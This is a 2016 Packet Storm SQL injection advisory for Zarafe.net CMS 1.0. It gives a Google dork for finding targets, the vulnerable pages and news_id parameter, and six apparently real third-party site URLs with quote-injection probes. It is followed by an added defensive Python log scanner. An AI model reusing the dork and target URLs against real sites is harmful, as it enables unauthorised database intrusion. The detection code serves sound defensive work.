packetstorm (packetstormsecurity.com) | ICG SEC | PACKETSTORM:136711
Apr 18, 2016 - 12:00 a.m.

Zarafe.net CMS 1.0 SQL Injection

`Exploit Title : Zarafe.net CMS SQL Injection Vulnerability  
Exploit Author : Iran Cyber Security Group (ICSG)  
Discovered By : 0x3a  
Vendor HomePage : www.zarrafe.net  
Version : 1.0 (Q1)  
Date : 4 April, 2016  
Tested On : Internet Explorer , Win 98  
-----------------------------------------  
SQL Injection :  
For Finding Target First You Must Search The Dork And Select Your Target  
  
Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت"  
  
Vulnerable Page : news.php , news_view.php , product.php  
Vulnerable Variable : news_id=  
Demo :  
novinsystemfars.ir/news_view.php?news_id=30'  
pezeshkian-pharmacy.ir/news.php?news_id=3'  
sdshiraz.com/news.php?news_id=8'  
omidoor.com/products.php?product_category_code=12-15'  
meysam71.ir/news.php?khabar_id=10'  
etehadweb.ir/view_single_news.php?news_id=2  
  
  
[+][+][+][+][+][+][+]  
WWW.IRAN-CYBER.NET[+]  
[+][+][+][+][+][+][+]  
</0x3a>  
`
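
A defender-side check for the pages and parameter the advisory names, added here as an example that is not part of the original advisory: it scans web-server access logs for requests to `news.php`, `news_view.php` or `product.php` whose `news_id` is not a plain integer. The combined log format, the function name `suspicious_requests` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Pages and parameter named in the advisory.
PAGES = {"news.php", "news_view.php", "product.php"}
PARAM = "news_id"

# Assumed log layout (common/combined format):
# ip - - [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_requests(lines):
    """Return (ip, timestamp, page, value, status) for every request to an
    affected page whose news_id is not a plain decimal integer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        page = url.path.rsplit("/", 1)[-1].lower()
        if page not in PAGES:
            continue
        # parse_qsl percent-decodes, so an encoded quote (%27) is seen as "'".
        for name, value in parse_qsl(url.query):
            if name.lower() == PARAM and not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((m["ip"], m["ts"], page, value, int(m["status"])))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Apr/2016:10:00:01 +0000] "GET /news.php?news_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Apr/2016:10:00:05 +0000] "GET /news_view.php?news_id=30%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [18/Apr/2016:10:00:09 +0000] "GET /news.php?page=2&news_id=8\' HTTP/1.1" 200 4980',
    '192.0.2.44 - - [18/Apr/2016:10:01:00 +0000] "GET /contact.php?news_id=1%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit paired with a 500 status suggests the malformed value reached the database layer; the durable fix on the application side is to cast `news_id` to an integer and bind it in a parameterized query.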